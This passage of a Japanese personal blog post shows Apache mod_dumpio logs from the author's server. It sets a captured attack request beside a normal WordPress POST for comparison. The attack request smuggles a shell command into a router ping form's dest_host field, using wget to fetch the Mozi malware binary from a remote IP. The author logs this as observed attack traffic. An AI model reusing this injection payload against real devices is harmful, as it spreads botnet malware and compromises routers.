[Fri Nov 20 05:07:22.293887 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Connection: keep-alive\r\n
[Fri Nov 20 05:07:22.293891 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293913 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 32 bytes
[Fri Nov 20 05:07:22.293916 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip, deflate\r\n
[Fri Nov 20 05:07:22.293919 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293922 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 13 bytes
[Fri Nov 20 05:07:22.293925 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Accept: */*\r\n
[Fri Nov 20 05:07:22.293928 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293931 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 26 bytes
[Fri Nov 20 05:07:22.293933 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Hello, World\r\n
[Fri Nov 20 05:07:22.293936 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293939 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Fri Nov 20 05:07:22.293942 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 118\r\n
[Fri Nov 20 05:07:22.293945 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293948 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 05:07:22.293950 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 05:07:22.294089 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [readbytes-blocking] 118 readbytes
[Fri Nov 20 05:07:22.294095 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 118 bytes
[Fri Nov 20 05:07:22.294098 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://41.226.xxx.xxx:57757/Mozi.m+-O+->/tmp/gpon80;
[Fri Nov 20 05:07:22.294115 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(164): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_out
[Fri Nov 20 05:07:22.294118 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): 201 bytes
[Fri Nov 20 05:07:22.294121 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 05:07:22 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n
[Fri Nov 20 05:07:22.294126 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(164): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_out
[Fri Nov 20 05:07:22.294129 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): 196 bytes
[Fri Nov 20 05:07:22.294131 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n</body></html>\n

ちなみに正規のPOST通信の内容もerror.logに出力される。以下はWordPress人気記事プラグインに関連する正規の通信。


160.239.xxx.xxx - - [18/Nov/2020:23:41:21 +0000] "POST /index.php?rest_route=/wordpress-popular-posts/v1/popular-posts HTTP/1.1" 201 778 "https://mymanfile.com/?p=1246" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"


[Wed Nov 18 23:41:21.313224 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): POST /index.php?rest_route=/wordpress-popular-posts/v1/popular-posts HTTP/1.1\r\n
[Wed Nov 18 23:41:21.313256 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313260 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Wed Nov 18 23:41:21.313263 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Connection: keep-alive\r\n
[Wed Nov 18 23:41:21.313266 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313269 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Wed Nov 18 23:41:21.313272 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Host: mymanfile.com\r\n
[Wed Nov 18 23:41:21.313276 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313279 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 129 bytes
[Wed Nov 18 23:41:21.313281 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\r\n
[Wed Nov 18 23:41:21.313285 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313288 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 34 bytes
[Wed Nov 18 23:41:21.313290 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): X-Requested-With: XMLHttpRequest\r\n
[Wed Nov 18 23:41:21.313293 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313296 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 23:41:21.313299 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Content-type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 23:41:21.313302 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313305 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 13 bytes
[Wed Nov 18 23:41:21.313307 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept: */*\r\n
[Wed Nov 18 23:41:21.313310 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313313 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 30 bytes
[Wed Nov 18 23:41:21.313316 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Origin: https://mymanfile.com\r\n
[Wed Nov 18 23:41:21.313319 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313321 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 39 bytes
[Wed Nov 18 23:41:21.313324 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Referer: https://mymanfile.com/?p=1246\r\n
[Wed Nov 18 23:41:21.313331 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313334 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 23:41:21.313336 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 23:41:21.313339 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313342 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 42 bytes
[Wed Nov 18 23:41:21.313345 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept-Language: ja,en-US;q=0.9,en;q=0.8\r\n
[Wed Nov 18 23:41:21.313348 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313350 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 23:41:21.313353 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 60\r\n
[Wed Nov 18 23:41:21.313356 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313359 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 18 bytes
[Wed Nov 18 23:41:21.313361 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): X-IMForwards: 20\r\n
[Wed Nov 18 23:41:21.313364 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313367 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 58 bytes
[Wed Nov 18 23:41:21.313370 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Via: 1.1 proxy04.soliton.co.jp:80 (Cisco-WSA/11.8.1-023)\r\n
[Wed Nov 18 23:41:21.313373 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313375 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 23:41:21.313378 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 23:41:21.313507 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [readbytes-blocking] 60 readbytes
[Wed Nov 18 23:41:21.313513 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 60 bytes
[Wed Nov 18 23:41:21.313516 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): _wpnonce=de1121c8e8&wpp_id=1246&sampling=0&sampling_rate=100
[Wed Nov 18 23:41:21.334500 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(164): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_out
[Wed Nov 18 23:41:21.334521 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_out (data-HEAP): 723 bytes
[Wed Nov 18 23:41:21.334525 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 201 Created\r\nDate: Wed, 18 Nov 2020 23:41:21 GMT\r\nServer: Apache\r\nX-Robots-Tag: noindex\r\nLink: <https://mymanfile.com/index.php?rest_route=/>; rel="https://api.w.org/"\r\nX-Content-Type-Options: nosniff\r\nAccess-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link\r\nAccess-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type\r\nX-WP-Nonce: de1121c8e8\r\nAllow: GET, POST\r\nAccess-Control-Allow-Origin: https://mymanfile.com\r\nAccess-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE\r\nAccess-Control-Allow-Credentials: true\r\nVary: Origin\r\nContent-Length: 55\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n

最近はアクセスログを見る機会が減っていたが、また少しログを眺めるのが楽しくなるかも?

IT業従事者。2018年10月末よりシンガポール在住。

Leave a Reply

Your email address will not be published. Required fields are marked *